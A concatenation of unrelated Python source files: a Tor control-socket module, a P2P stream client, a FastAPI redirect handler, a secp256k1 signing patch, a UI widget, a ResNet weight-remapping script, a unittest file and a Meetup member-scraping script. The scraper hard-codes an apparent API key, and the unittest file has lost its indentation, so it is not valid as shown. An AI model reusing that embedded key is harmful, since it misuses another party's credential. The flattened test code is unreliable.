          * :class:`stem.SocketError` if a problem arises in using the socket
          * :class:`stem.SocketClosed` if the socket is known to be shut down
        """

        def handler(sock, sock_file, msg):
            send_message(sock_file, msg)

        self._send(message, handler)

    def recv(self):
        """
        Receives a message from the control socket, blocking until we've received
        one. For more information see the :func:`~stem.socket.recv_message` function.

        :returns: :class:`~stem.response.ControlMessage` for the message received

        :raises:
          * :class:`stem.ProtocolError` the content from the socket is malformed
          * :class:`stem.SocketClosed` if the socket closes before we receive a complete message
        """

        def handler(sock, sock_file):
            return recv_message(sock_file)

        return self._recv(handler)
class ControlPort(ControlSocket):
    """
    Control connection over tor's ControlPort (see the ControlPort torrc
    option).

    :var str address: address our socket connects to
    :var int port: ControlPort our socket connects to
    """

    def __init__(self, address = '127.0.0.1', port = 9051, connect = True):
        """
        ControlPort constructor.

        :param str address: ip address of the controller
        :param int port: port number of the controller
        :param bool connect: connects to the socket if True, leaves it unconnected otherwise

        :raises: :class:`stem.SocketError` if connect is **True** and we're
          unable to establish a connection
        """
        super(ControlPort, self).__init__()
        self.address = address
        self.port = port
        if not connect:
            return
        self.connect()

    def get_address(self):
        """
        Provides the ip address our socket connects to.

        .. deprecated:: 1.7.0
           Use the **address** attribute instead.

        :returns: str with the ip address of our socket
        """
        return self.address

    def get_port(self):
        """
        Provides the port our socket connects to.

        .. deprecated:: 1.7.0
           Use the **port** attribute instead.

        :returns: int with the port of our socket
        """
        return self.port

    def is_localhost(self):
        # Only the loopback address counts as local for a TCP control port.
        return self.address == '127.0.0.1'

    def _make_socket(self):
        try:
            tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            tcp_socket.connect((self.address, self.port))
            return tcp_socket
        except socket.error as exc:
            raise stem.SocketError(exc)
class ControlSocketFile(ControlSocket):
    """
    Control connection over tor's unix domain socket (see the ControlSocket
    torrc option).

    :var str path: filesystem path of the socket we connect to
    """

    def __init__(self, path = '/var/run/tor/control', connect = True):
        """
        ControlSocketFile constructor.

        :param str socket_path: path where the control socket is located
        :param bool connect: connects to the socket if True, leaves it unconnected otherwise

        :raises: :class:`stem.SocketError` if connect is **True** and we're
          unable to establish a connection
        """
        super(ControlSocketFile, self).__init__()
        self.path = path
        if not connect:
            return
        self.connect()

    def get_socket_path(self):
        """
        Provides the path our socket connects to.

        .. deprecated:: 1.7.0
           Use the **path** attribute instead.

        :returns: str with the path for our control socket
        """
        return self.path

    def is_localhost(self):
        # Unix domain sockets are inherently local.
        return True

    def _make_socket(self):
        try:
            unix_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            unix_socket.connect(self.path)
            return unix_socket
        except socket.error as exc:
            raise stem.SocketError(exc)
def send_message(control_file, message, raw = False):
    """
    Sends a message to the control socket, adding the expected formatting for
    single verses multi-line messages. Neither message type should contain an
    ending newline (if so it'll be treated as a multi-line message with a blank
    line at the end). If the message doesn't contain a newline then it's sent
    as...

    ::

      <message>\\r\\n

    and if it does contain newlines then it's split on ``\\n`` and sent as...

    ::

      +<line 1>\\r\\n
      <line 2>\\r\\n
      <line 3>\\r\\n
      .\\r\\n

    :param file control_file: file derived from the control socket (see the
      socket's makefile() method for more information)
    :param str message: message to be sent on the control socket
    :param bool raw: leaves the message formatting untouched, passing it to the
      socket as-is

    :raises:
      * :class:`stem.SocketError` if a problem arises in using the socket
      * :class:`stem.SocketClosed` if the socket is known to be shut down
    """

    payload = message if raw else send_formatting(message)
    _write_to_socket(control_file, payload)

    if log.is_tracing():
        logged = payload.replace('\r\n', '\n').rstrip()
        separator = '\n' if '\n' in logged else ' '
        log.trace('Sent to tor:%s%s' % (separator, logged))
def _write_to_socket(socket_file, message):
    # Low-level helper: encode *message* to bytes and flush it to the socket's
    # file wrapper, translating failures into stem exceptions.
    try:
        socket_file.write(stem.util.str_tools._to_bytes(message))
        socket_file.flush()
    except socket.error as exc:
        log.info('Failed to send: %s' % exc)
        # When sending there doesn't seem to be a reliable method for
        # distinguishing between failures from a disconnect verses other things.
        # Just accounting for known disconnection responses.
        if str(exc) == '[Errno 32] Broken pipe':
            raise stem.SocketClosed(exc)
        else:
            raise stem.SocketError(exc)
    except AttributeError:
        # if the control_file has been closed then flush will receive:
        # AttributeError: 'NoneType' object has no attribute 'sendall'
        log.info('Failed to send: file has been closed')
        raise stem.SocketClosed('file has been closed')
def recv_message(control_file, arrived_at = None):
    """
    Pulls from a control socket until we either have a complete message or
    encounter a problem.

    :param file control_file: file derived from the control socket (see the
      socket's makefile() method for more information)
    :param float arrived_at: unix timestamp to attach to the parsed message,
      **None** by default

    :returns: :class:`~stem.response.ControlMessage` read from the socket

    :raises:
      * :class:`stem.ProtocolError` the content from the socket is malformed
      * :class:`stem.SocketClosed` if the socket closes before we receive
        a complete message
    """
    parsed_content, raw_content, first_line = None, None, True
    while True:
        try:
            line = control_file.readline()
        except AttributeError:
            # if the control_file has been closed then we will receive:
            # AttributeError: 'NoneType' object has no attribute 'recv'
            log.info(ERROR_MSG % ('SocketClosed', 'socket file has been closed'))
            raise stem.SocketClosed('socket file has been closed')
        except (socket.error, ValueError) as exc:
            # When disconnected we get...
            #
            # Python 2:
            #   socket.error: [Errno 107] Transport endpoint is not connected
            #
            # Python 3:
            #   ValueError: I/O operation on closed file.
            log.info(ERROR_MSG % ('SocketClosed', 'received exception "%s"' % exc))
            raise stem.SocketClosed(exc)
        # Parses the tor control lines. These are of the form...
        # <status code><divider><content>\r\n
        if not line:
            # if the socket is disconnected then the readline() method will provide
            # empty content
            log.info(ERROR_MSG % ('SocketClosed', 'empty socket content'))
            raise stem.SocketClosed('Received empty socket content.')
        elif not MESSAGE_PREFIX.match(line):
            log.info(ERROR_MSG % ('ProtocolError', 'malformed status code/divider, "%s"' % log.escape(line)))
            raise stem.ProtocolError('Badly formatted reply line: beginning is malformed')
        elif not line.endswith(b'\r\n'):
            log.info(ERROR_MSG % ('ProtocolError', 'no CRLF linebreak, "%s"' % log.escape(line)))
            raise stem.ProtocolError('All lines should end with CRLF')
        status_code, divider, content = line[:3], line[3:4], line[4:-2]  # strip CRLF off content
        if stem.prereq.is_python_3():
            status_code = stem.util.str_tools._to_unicode(status_code)
            divider = stem.util.str_tools._to_unicode(divider)
        # Most controller responses are single lines, in which case we don't need
        # so much overhead.
        if first_line:
            if divider == ' ':
                _log_trace(line)
                return stem.response.ControlMessage([(status_code, divider, content)], line, arrived_at = arrived_at)
            else:
                parsed_content, raw_content, first_line = [], bytearray(), False
        raw_content += line
        if divider == '-':
            # mid-reply line, keep pulling for more content
            parsed_content.append((status_code, divider, content))
        elif divider == ' ':
            # end of the message, return the message
            parsed_content.append((status_code, divider, content))
            _log_trace(bytes(raw_content))
            return stem.response.ControlMessage(parsed_content, bytes(raw_content), arrived_at = arrived_at)
        elif divider == '+':
            # data entry, all of the following lines belong to the content until we
            # get a line with just a period
            content_block = bytearray(content)
            while True:
                try:
                    line = control_file.readline()
                    raw_content += line
                except socket.error as exc:
                    log.info(ERROR_MSG % ('SocketClosed', 'received an exception while mid-way through a data reply (exception: "%s", read content: "%s")' % (exc, log.escape(bytes(raw_content)))))
                    raise stem.SocketClosed(exc)
                if not line.endswith(b'\r\n'):
                    log.info(ERROR_MSG % ('ProtocolError', 'CRLF linebreaks missing from a data reply, "%s"' % log.escape(bytes(raw_content))))
                    raise stem.ProtocolError('All lines should end with CRLF')
                elif line == b'.\r\n':
                    break  # data block termination
                line = line[:-2]  # strips off the CRLF
                # lines starting with a period are escaped by a second period (as per
                # section 2.4 of the control-spec)
                if line.startswith(b'..'):
                    line = line[1:]
                content_block += b'\n' + line
            # joins the content using a newline rather than CRLF separator (more
            # conventional for multi-line string content outside the windows world)
            parsed_content.append((status_code, divider, bytes(content_block)))
        else:
            # this should never be reached due to the prefix regex, but might as well
            # be safe...
            log.warn(ERROR_MSG % ('ProtocolError', "\"%s\" isn't a recognized divider type" % divider))
            raise stem.ProtocolError("Unrecognized divider type '%s': %s" % (divider, stem.util.str_tools._to_unicode(line)))
def send_formatting(message):
    """
    Performs the formatting expected from sent control messages. For more
    information see the :func:`~stem.socket.send_message` function.

    :param str message: message to be formatted

    :returns: **str** of the message wrapped by the formatting expected from
      controllers
    """
    # From control-spec section 2.2...
    #   Command = Keyword OptArguments CRLF / "+" Keyword OptArguments CRLF CmdData
    #   Keyword = 1*ALPHA
    #   OptArguments = [ SP *(SP / VCHAR) ]
    #
    # A command is either a single line containing a Keyword and arguments, or a
    # multiline command whose initial keyword begins with +, and whose data
    # section ends with a single "." on a line of its own.

    # Standardize any existing \r\n line endings on \n before deciding.
    normalized = message.replace('\r\n', '\n')

    if '\n' not in normalized:
        return normalized + '\r\n'

    return '+%s\r\n.\r\n' % normalized.replace('\n', '\r\n')
def _log_trace(response):
  """
  Trace-logs raw content received from tor, truncating very long replies.

  :param bytes response: raw reply content that was received
  """

  if not log.is_tracing():
    return

  # normalize CRLF to plain newlines and drop trailing whitespace
  content = stem.util.str_tools._to_unicode(response.replace(b'\r\n', b'\n').rstrip())
  lines = content.split('\n')

  # cap very long messages, noting how much was dropped
  if TRUNCATE_LOGS and len(lines) > TRUNCATE_LOGS:
    remainder = len(lines) - TRUNCATE_LOGS
    content = '\n'.join(lines[:TRUNCATE_LOGS] + ['... %i more lines...' % remainder])

  # note: the short/long decision uses the pre-truncation line count
  if len(lines) > 2:
    log.trace('Received from tor:\n%s' % content)
  else:
    log.trace('Received from tor: %s' % content.replace('\n', '\\n'))
|
# -*- coding: utf-8 -*-
# Copyright 2012 Loris Corazza, Sakis Christakidis
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from p2ner.abstract.stream import Stream
from p2ner.core.components import loadComponent
from messages.serverstarted import ServerStartedMessage, StartRemoteMessage
from messages.serverstopped import ServerStoppedMessage
defaultScheduler = ("PullClient", [], {})
defaultOverlay = ("CentralClient", [], {})
class StreamClient(Stream):
    """Receiving side of a P2NER stream.

    Wires an overlay and a scheduler component around the shared
    traffic/control pipes and relays server start/stop control messages.
    """

    def initStream(self, *args, **kwargs): #stream, scheduler=defaultScheduler, overlay=defaultOverlay,producer=False):
        # Framework-invoked initializer (used in place of __init__).
        self.producing=False
        self.running=False
        # per-stream child logger tagged with the stream id
        self.log=self.logger.getLoggerChild(('c'+str(self.stream.id)),self.interface)
        self.log.info('new stream')
        self.log.info('%s',self.stream)
        # fail fast if required sibling components are missing
        self.sanityCheck(["trafficPipe", "controlPipe", "output"])
        # overlay: use the stream's requested component, else the default
        c,a,k=defaultOverlay
        if self.stream.overlay:
            c=self.stream.overlay['component']
        self.log.debug('trying to load %s',c)
        self.overlay = loadComponent("overlay", c)(_parent=self, *a,**k)
        # scheduler: same selection pattern as the overlay above
        c,a,k=defaultScheduler
        if self.stream.scheduler:
            c=self.stream.scheduler['component']
        self.log.debug('trying to load %s',c)
        self.scheduler = loadComponent("scheduler", c)(_parent=self,* a,**k)
        self.trafficPipe.registerProducer(self.scheduler)
        self.registerMessages()

    def registerMessages(self):
        """Register the control messages this stream listens for."""
        self.messages = []
        self.messages.append(ServerStartedMessage())
        self.messages.append(ServerStoppedMessage())

    def startRemoteProducer(self):
        """Ask the remote server to start producing this stream."""
        self.log.debug('sending startRemote message to %s',self.server)
        StartRemoteMessage.send(self.stream.id,self.server,self.controlPipe)

    def start(self):
        """Mark the stream live and start the output and scheduler components."""
        if not self.running:
            self.log.info('stream is starting')
            self.stream.live=True
            self.interface.setLiveStream(self.stream.id,True)
            self.running=True
            for c in ["output", "scheduler"]:
                self.log.debug('trying to start %s',c)
                self[c].start()

    def stop(self):
        """Stop the overlay first, then finish teardown in _stop.

        Returns the overlay's deferred so callers can chain on completion.
        """
        if True:#self.running:  NOTE(review): the running check is disabled -- confirm this is intentional
            self.log.info('should stop stream')
            d=self['overlay'].stop()
            d.addCallback(self._stop)
            return d

    def _stop(self,res):
        # Deferred callback: tear down components and deregister the stream.
        self.log.info('stream is stopping')
        self.running=False
        self.stream.live=False
        self.interface.setLiveStream(self.stream.id,False)
        self.trafficPipe.unregisterProducer(self.scheduler)
        for c in ["output", "scheduler"]:
            self.log.debug('trying to stop %s',c)
            self[c].stop()
        self.log.info('removing stream')
        self.root.delStream(self.stream.id)
        # release the component namespaces, including the overlay's
        for c in ["output", "scheduler",'overlay']:
            self[c].purgeNS()
        self.purgeNS()
|
from fastapi import Request, Response
from fastapi.responses import RedirectResponse
from fps.hooks import register_exception_handler
from fps.logging import get_configured_logger
logger = get_configured_logger("helloworld")
class RedirectException(Exception):
    """Exception carrying a redirect target for the installed handler.

    ``reason`` is a human-readable explanation; ``redirect_to`` is the URL
    the client should be sent to.
    """

    def __init__(self, reason, redirect_to):
        # store the target first, then the explanation (both are plain attrs)
        self.redirect_to = redirect_to
        self.reason = reason
async def exception_handler(request: Request, exc: RedirectException) -> Response:
    """Convert a RedirectException into an HTTP redirect response."""
    # log the reason so redirects remain traceable in server logs
    logger.warning(f"'{exc.reason}' caused redirection to '{exc.redirect_to}'")
    return RedirectResponse(url=exc.redirect_to)


# Register with fps so the handler gets installed into the FastAPI app.
h = register_exception_handler(RedirectException, exception_handler)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# -*- mode: python3 -*-
# taken (with minor modifications) from pycoin
# https://github.com/richardkiss/pycoin/blob/01b1787ed902df23f99a55deb00d8cd076a906fe/pycoin/ecdsa/native/secp256k1.py
import os
import sys
import traceback
import ecdsa
from ctypes import (byref, c_size_t, create_string_buffer)
from .util import print_error, print_msg
from . import secp256k1
class _patched_functions:
    # Namespace holding the original python-ecdsa callables, their
    # libsecp256k1-backed replacements, and the current patch state.
    prepared_to_patch = False       # replacements have been built
    monkey_patching_active = False  # replacements are currently installed
def _prepare_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1():
    """Build libsecp256k1-backed replacements for python-ecdsa internals.

    Populates _patched_functions with fast sign/verify/mul implementations
    (and saves the originals so patching can be undone). Does nothing when
    the native library is unavailable.
    """
    if not secp256k1.secp256k1:
        return
    # save original functions so that we can undo patching (needed for tests)
    _patched_functions.orig_sign = staticmethod(ecdsa.ecdsa.Private_key.sign)
    _patched_functions.orig_verify = staticmethod(ecdsa.ecdsa.Public_key.verifies)
    _patched_functions.orig_mul = staticmethod(ecdsa.ellipticcurve.Point.__mul__)
    curve_secp256k1 = ecdsa.ecdsa.curve_secp256k1
    curve_order = ecdsa.curves.SECP256k1.order
    point_at_infinity = ecdsa.ellipticcurve.INFINITY
    def mul(self: ecdsa.ellipticcurve.Point, other: int):
        """Scalar-multiply a point via libsecp256k1's pubkey tweak."""
        if self.curve() != curve_secp256k1:
            # this operation is not on the secp256k1 curve; use original implementation
            return _patched_functions.orig_mul(self, other)
        other %= curve_order
        if self == point_at_infinity or other == 0:
            return point_at_infinity
        pubkey = create_string_buffer(64)
        # 0x04 prefix marks an uncompressed public-key encoding
        public_pair_bytes = b'\4' + self.x().to_bytes(32, byteorder="big") + self.y().to_bytes(32, byteorder="big")
        r = secp256k1.secp256k1.secp256k1_ec_pubkey_parse(
            secp256k1.secp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
        if not r:
            # NOTE(review): returning False here differs from the other
            # failure path below (point_at_infinity) -- confirm intended.
            return False
        r = secp256k1.secp256k1.secp256k1_ec_pubkey_tweak_mul(secp256k1.secp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
        if not r:
            return point_at_infinity
        pubkey_serialized = create_string_buffer(65)
        pubkey_size = c_size_t(65)
        secp256k1.secp256k1.secp256k1_ec_pubkey_serialize(
            secp256k1.secp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, secp256k1.SECP256K1_EC_UNCOMPRESSED)
        # uncompressed serialization is 0x04 || X(32) || Y(32)
        x = int.from_bytes(pubkey_serialized[1:33], byteorder="big")
        y = int.from_bytes(pubkey_serialized[33:], byteorder="big")
        return ecdsa.ellipticcurve.Point(curve_secp256k1, x, y, curve_order)
    def sign(self: ecdsa.ecdsa.Private_key, hash: int, random_k: int):
        # note: random_k is ignored (a None nonce function is passed, so the
        # library falls back to its default deterministic nonce)
        if self.public_key.curve != curve_secp256k1:
            # this operation is not on the secp256k1 curve; use original implementation
            return _patched_functions.orig_sign(self, hash, random_k)
        secret_exponent = self.secret_multiplier
        nonce_function = None
        sig = create_string_buffer(64)
        sig_hash_bytes = hash.to_bytes(32, byteorder="big")
        secp256k1.secp256k1.secp256k1_ecdsa_sign(
            secp256k1.secp256k1.ctx, sig, sig_hash_bytes, secret_exponent.to_bytes(32, byteorder="big"), nonce_function, None)
        compact_signature = create_string_buffer(64)
        secp256k1.secp256k1.secp256k1_ecdsa_signature_serialize_compact(secp256k1.secp256k1.ctx, compact_signature, sig)
        # compact form is r || s, each 32 big-endian bytes
        r = int.from_bytes(compact_signature[:32], byteorder="big")
        s = int.from_bytes(compact_signature[32:], byteorder="big")
        return ecdsa.ecdsa.Signature(r, s)
    def verify(self: ecdsa.ecdsa.Public_key, hash: int, signature: ecdsa.ecdsa.Signature):
        """Verify an ECDSA signature via libsecp256k1. Returns a bool."""
        if self.curve != curve_secp256k1:
            # this operation is not on the secp256k1 curve; use original implementation
            return _patched_functions.orig_verify(self, hash, signature)
        sig = create_string_buffer(64)
        input64 = signature.r.to_bytes(32, byteorder="big") + signature.s.to_bytes(32, byteorder="big")
        r = secp256k1.secp256k1.secp256k1_ecdsa_signature_parse_compact(secp256k1.secp256k1.ctx, sig, input64)
        if not r:
            return False
        # normalize in place; verification rejects non-normalized (high-s) sigs
        r = secp256k1.secp256k1.secp256k1_ecdsa_signature_normalize(secp256k1.secp256k1.ctx, sig, sig)
        public_pair_bytes = b'\4' + self.point.x().to_bytes(32, byteorder="big") + self.point.y().to_bytes(32, byteorder="big")
        pubkey = create_string_buffer(64)
        r = secp256k1.secp256k1.secp256k1_ec_pubkey_parse(
            secp256k1.secp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
        if not r:
            return False
        return 1 == secp256k1.secp256k1.secp256k1_ecdsa_verify(secp256k1.secp256k1.ctx, sig, hash.to_bytes(32, byteorder="big"), pubkey)
    # save new functions so that we can (re-)do patching
    _patched_functions.fast_sign = sign
    _patched_functions.fast_verify = verify
    _patched_functions.fast_mul = mul
    _patched_functions.prepared_to_patch = True
def do_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1():
    """Install the prepared libsecp256k1-backed implementations into python-ecdsa.

    Prints a hint and leaves python-ecdsa untouched when the native library
    is unavailable.

    Raises:
        Exception: if the prepare step has not been run first.
    """
    if not secp256k1.secp256k1:
        # native library missing -- stay on the pure-python implementation
        print_msg('[ecc] info: libsecp256k1 library not available, falling back to python-ecdsa. '
                  'This means signing operations will be slower. '
                  'Try running:\n\n $ contrib/make_secp\n\n(You need to be running from the git sources for contrib/make_secp to be available)'
                  )
        return
    if not _patched_functions.prepared_to_patch:
        raise Exception("can't patch python-ecdsa without preparations")
    # swap the slow pure-python entry points for the prepared fast ones
    replacements = (
        (ecdsa.ecdsa.Private_key, 'sign', _patched_functions.fast_sign),
        (ecdsa.ecdsa.Public_key, 'verifies', _patched_functions.fast_verify),
        (ecdsa.ellipticcurve.Point, '__mul__', _patched_functions.fast_mul),
    )
    for target, attr, func in replacements:
        setattr(target, attr, func)
    # ecdsa.ellipticcurve.Point.__add__ = ... # TODO??
    _patched_functions.monkey_patching_active = True
def undo_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1():
    """Restore the original python-ecdsa implementations saved during prepare.

    Raises:
        Exception: if the prepare step has not been run first.
    """
    if not secp256k1.secp256k1:
        return
    if not _patched_functions.prepared_to_patch:
        raise Exception("can't patch python-ecdsa without preparations")
    # put back the saved originals
    originals = (
        (ecdsa.ecdsa.Private_key, 'sign', _patched_functions.orig_sign),
        (ecdsa.ecdsa.Public_key, 'verifies', _patched_functions.orig_verify),
        (ecdsa.ellipticcurve.Point, '__mul__', _patched_functions.orig_mul),
    )
    for target, attr, func in originals:
        setattr(target, attr, func)
    _patched_functions.monkey_patching_active = False
def is_using_fast_ecc():
    """Return whether the libsecp256k1 monkey patches are currently active."""
    return _patched_functions.monkey_patching_active
# Prepare (but do not yet install) the patched functions at import time.
_prepare_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1()
|
from __future__ import annotations
from rich.console import RenderableType
from rich.padding import Padding, PaddingDimensions
from rich.style import StyleType
from rich.styled import Styled
from ..widget import Widget
class Static(Widget):
    """A widget that displays a fixed Rich renderable.

    The renderable can be swapped at runtime via :meth:`update`, and is
    optionally wrapped with padding and a style when rendered.
    """

    def __init__(
        self,
        renderable: RenderableType,
        name: str | None = None,
        style: StyleType = "",
        padding: PaddingDimensions = 0,
    ) -> None:
        super().__init__(name)
        # what gets drawn, plus optional decoration applied at render time
        self.renderable = renderable
        self.style = style
        self.padding = padding

    def render(self) -> RenderableType:
        """Return the renderable wrapped in padding/style as configured."""
        content = self.renderable
        if self.padding:
            content = Padding(content, self.padding)
        return Styled(content, self.style)

    async def update(self, renderable: RenderableType) -> None:
        """Replace the displayed renderable and request a repaint."""
        self.renderable = renderable
        self.refresh()
|
import torch.utils.model_zoo as model_zoo
import torch
import numpy as np
from collections import OrderedDict
model_urls = {
    'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
    'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
    'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
    'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
    'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}

# Download the torchvision ResNet-50 weights and rename their keys from the
# module-style layout (conv1, bn1, layer1.0, ...) into a flat sequential
# index layout (0, 1, 4, 5, ...), then save the remapped state dict.
r50 = model_zoo.load_url(model_urls['resnet50'])

# stem layers map to sequential indices 0 (conv) and 1 (bn)
nk0 = {'conv1': '0', 'bn1': '1'}
# number of residual blocks per stage in ResNet-50
bb = np.array([3, 4, 6, 3])

for i in range(len(r50)):
    # pop from the front and re-insert (renamed) at the back; after one full
    # pass the ordered dict keeps its original order with the new keys
    k, v = r50.popitem(False)
    key = k.split('.')
    if key[0] in nk0:
        # stem: conv1/bn1 -> '0'/'1'
        key[0] = nk0[key[0]]
        nk = '.'.join(key)
        r50[nk] = v
    elif key[0].startswith('layer'):
        # stage blocks: flatten 'layerL.B' into a single running index,
        # offset by 4 (the stem occupies indices 0-3 in the target layout)
        layer = int(key[0][-1]) - 1
        key[0] = str(bb[:layer].sum() + int(key[1]) + 4)
        del key[1]
        nk = '.'.join(key)
        r50[nk] = v
        print(i, nk, k)
    # keys matching neither pattern (e.g. the final 'fc.*') are popped and
    # not re-inserted, i.e. dropped -- assumed intentional for backbone-only
    # use; TODO confirm

torch.save(r50, 'resnet50.pth')
|
import unittest
from scipy.stats import ttest_ind, pearsonr, ks_2samp
from utils import prepare_data
class TestExercise2_04(unittest.TestCase):
def setUp(self):
self.data = prepare_data()
self.data["Disease"] = self.data["Reason for absence"].apply(self.in_icd)
def in_icd(self, val):
return "Yes" if val >= 1 and val <= 21 else "No"
def test_pearson(self):
pearson_test = pearsonr(self.data["Age"], self.data["Absenteeism time in hours"])
self.assertAlmostEqual(pearson_test[0], 0.065, places=2)
self.assertAlmostEqual(pearson_test[1], 0.073, places=2)
def test_means(self):
means = self.data[["Disease", "Age"]].groupby("Disease").mean()
self.assertAlmostEqual(means["Age"]["Yes"], 36.652, places=2)
self.assertAlmostEqual(means["Age"]["No"], 36.338, places=2)
def test_ks(self):
disease_mask = self.data["Disease"] == "Yes"
disease_ages = self.data["Age"][disease_mask]
no_disease_ages = self.data["Age"][~disease_mask]
test_res = ttest_ind(disease_ages, no_disease_ages)
ks_res = ks_2samp(disease_ages, no_disease_ages)
self.assertAlmostEqual(test_res[0], 0.629, places=2)
self.assertAlmostEqual(test_res[1], 0.529, places=2)
self.assertAlmostEqual(ks_res[0], 0.056, places=2)
self.assertAlmostEqual(ks_res[1], 0.618, places=2)
|
import pandas as pd
import numpy as np
import requests
import os
import json
import matplotlib.pyplot as plt
from time import sleep
# Need to load an api-key
# SECURITY NOTE(review): a hard-coded API key should live in an environment
# variable or config file rather than being committed to source.
api_key = '646928682c4b5d6f5f6c782a6b351b29'


def get_all_groups(location_str, radius=25, write_path=None, api_key=api_key):
    '''Gets a list of all groups within a set radius from a location. Returns a dataframe.

    Parameters
    ----------
    location_str : str
        Location accepted by the Meetup "find/groups" endpoint.
    radius : int, optional
        Search radius (default 25).
    write_path : str, optional
        If given, the resulting dataframe is also written to this CSV path.
    api_key : str, optional
        Meetup API key.
    '''
    cols = ('group_id', 'group_name', 'num_members', 'category_id',
            'category_name', 'organizer_id', 'group_urlname')
    rows = []
    for page in np.arange(10):
        q = 'https://api.meetup.com/find/groups?&sign=true&location={}&radius={}&page=200&offset={}'.format(location_str, radius, page)
        q += '&key={}'.format(api_key)
        response = requests.get(q).json()
        if len(response) > 0:
            try:
                for g in response:
                    # collect plain tuples; building the DataFrame once at the
                    # end replaces the removed DataFrame.append and avoids
                    # quadratic re-allocation
                    rows.append((g['id'], g['name'], g['members'], g['category']['id'],
                                 g['category']['name'], g['organizer']['id'], g['urlname']))
            except KeyError as exc:
                # some groups lack a category/organizer; report and move on
                print(g['name'], exc)
        # Sleep briefly so that API doesn't get overwhelmed
        sleep(0.2)
    all_groups = pd.DataFrame(rows, columns=cols)
    all_groups = all_groups.astype({'group_id': int, 'organizer_id': int, 'category_id': int, 'num_members': int})
    all_groups = all_groups.set_index('group_id')
    # Write to computer
    if write_path:
        all_groups.to_csv(write_path, encoding='utf-8')
    return all_groups
def get_group_members(group_id, api_key):
    '''Accepts a Meetup group ID number and returns dataframe with all members in the group.

    Pages through the /2/members endpoint until an empty result page is seen,
    giving up after more than 5 failed iterations.
    '''
    # Initialize variables
    members = pd.DataFrame()
    page = 0
    bad_iters = 0  # count of failed pages; used to bail out of the loop
    # Keep querying until there are no more results
    all_results = False
    while all_results == False:
        q = 'https://api.meetup.com/2/members?'
        q += '&sign=true&group_id={}&only=name,id,city,state,hometown,joined,visited,lat,lon&page=200&offset={}'.format(group_id, page)
        q += '&key={}'.format(api_key)
        response = requests.get(q).json()
        if 'results' in response.keys():
            if len(response['results']) == 0:
                # empty page: we've consumed every member
                all_results = True
            try:
                tdf = pd.DataFrame.from_dict(response['results'])
                members = members.append(tdf)
                page += 1
            except KeyError as exc:
                # malformed page: stop after too many failures
                all_results = True
                bad_iters += 1
                if bad_iters > 5:
                    all_results=True
                pass
            except json.decoder.JSONDecodeError:
                # NOTE(review): the JSON decode happens in requests.get(...).json()
                # above, outside this try -- this handler looks unreachable here;
                # confirm whether the try was meant to wrap the request.
                bad_iters += 1
                if bad_iters > 5:
                    all_results=True
                pass
    # tag every row with the group it came from
    members['group_id'] = group_id
    return members
def agg_group_members(list_of_group_ids, api_key, write_path=None, intermediate_path=None):
    '''Retrieves member data for a list of MeetUp groups. Returns a dataframe with this information.

    Parameters
    ----------
    list_of_group_ids : iterable
        Meetup group ID numbers to fetch members for.
    api_key : str
        Meetup API key.
    write_path : str, optional
        If given, the combined dataframe is written to this CSV path.
    intermediate_path : str, optional
        If given, each group's members are also written to
        ``{intermediate_path}/{group_id}.csv`` as they are fetched.
    '''
    frames = []
    for g in list_of_group_ids:
        sleep(1)  # throttle so the API doesn't get overwhelmed
        try:
            tdf = get_group_members(g, api_key)
            if intermediate_path:
                tdf.to_csv('{}/{}.csv'.format(intermediate_path, g), encoding='utf-8')
            frames.append(tdf)
        except KeyError as exc:
            # BUG FIX: previously printed the undefined name `group`, which
            # raised a NameError instead of reporting the failing group id.
            print(g, exc)
            continue
    # one concat at the end replaces the removed DataFrame.append
    all_members = pd.concat(frames) if frames else pd.DataFrame()
    # Write to computer
    if write_path:
        #for date_col in ['joined', 'visited']:
        #    members[date_col] = pd.to_datetime(members[date_col], unit='ms')
        all_members.to_csv(write_path, encoding='utf-8')
    return all_members
def get_events(urlname, date_filter_str=None, api_key=api_key):
    ''' Takes a Meetup group urlname and returns a DataFrame of events. Optionally, filter by date.

    Raises
    ------
    ValueError
        If the group is not accessible (HTTP 410) or returns no events.
    '''
    q = 'https://api.meetup.com/{}/events?'.format(urlname)
    q += '&sign=true&page=200&status=past&only=id,name,status,time,yes_rsvp_count&desc=True'
    # BUG FIX: the API key must be sent as the 'key' query parameter (as in
    # get_all_groups); previously only the raw key value was appended, so the
    # request went out without valid authentication.
    q += '&key={}'.format(api_key)
    response = requests.get(q)
    if response.status_code == 410:
        raise ValueError('Group not accessible.')
    if len(response.json()) == 0:
        raise ValueError('No event results.')
    events_df = pd.DataFrame.from_dict(response.json())
    # Meetup reports event times as epoch milliseconds
    events_df.time = pd.to_datetime(events_df.time, unit='ms')
    events_df['group_urlname'] = urlname
    if date_filter_str:
        events_df = events_df.loc[events_df.time > pd.to_datetime(date_filter_str)]
    return events_df
def get_event_rsvps(urlname, event_id, api_key=api_key):
    '''Accepts a group urlname and event id, and returns a dataframe of RSVPs.'''
    q = 'https://api.meetup.com/{}/events/{}/rsvps?'.format(urlname, event_id)
    q += '&sign=true&photo-host=public&response=yes&only=member'
    # BUG FIX: send the API key as the 'key' query parameter (as in
    # get_all_groups); the raw value alone was previously appended.
    q += '&key={}'.format(api_key)
    response = requests.get(q).json()
    # one row per "yes" RSVP
    member_list = [(urlname, event_id, mem['member']['id']) for mem in response]
